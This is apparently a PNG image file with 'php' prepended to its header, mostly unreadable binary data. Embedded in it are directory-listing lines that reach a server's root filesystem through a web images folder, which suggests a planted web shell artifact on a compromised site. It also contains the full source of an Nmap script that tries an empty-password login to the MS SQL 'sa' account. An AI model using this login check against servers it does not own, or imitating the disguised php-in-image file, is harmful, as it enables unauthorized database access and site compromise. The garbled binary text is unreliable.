php IHDR w Q )Ba pHYs sRGB gAMA a IDATxMk\U s&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨ G;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j- $_q?qS XzG'ay
files >> /var/www/html/sub/images/Rm19_symconf/root/usr/share/nmap/scripts/ |
files >> /var/www/html/sub/images/Rm19_symconf/root/usr/share/nmap/scripts/ms-sql-empty-password.nse |
description = [[ Attempts to authenticate using an empty password for the sysadmin (sa) account. ]] author = "Patrik Karlsson" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"auth","intrusive"} require 'shortport' require 'stdnse' require 'mssql' --- -- -- @output -- PORT STATE SERVICE -- 1433/tcp open ms-sql-s -- | ms-sql-empty-password: -- |_ sa:<empty> => Login Correct -- -- -- Version 0.1 -- Created 01/17/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net> portrule = shortport.port_or_service(1433, "ms-sql-s") action = function( host, port ) local helper, status, result local username, password, database, valid_accounts = "sa", "", "tempdb", {} helper = mssql.Helper:new() status, result = helper:Connect(host, port) if( not(status) ) then return " \n\n" .. result end status, result = helper:Login( username, password, database, host.ip ) helper:Disconnect() if status then nmap.registry.mssqlusers = nmap.registry.mssqlusers or {} nmap.registry.mssqlusers[username]=password table.insert( valid_accounts, string.format("%s:%s => Login Success", username, password:len()>0 and password or "<empty>" ) ) end return stdnse.format_output(true, valid_accounts) endy~or5J={Eeu磝Qk ᯘG{?+]ן?wM3X^歌>{7پK>on\jy Rg/=fOroNVv~Y+ NGuÝHWyw[eQʨSb> >}Gmx[o[<{Ϯ_qFvM IENDB`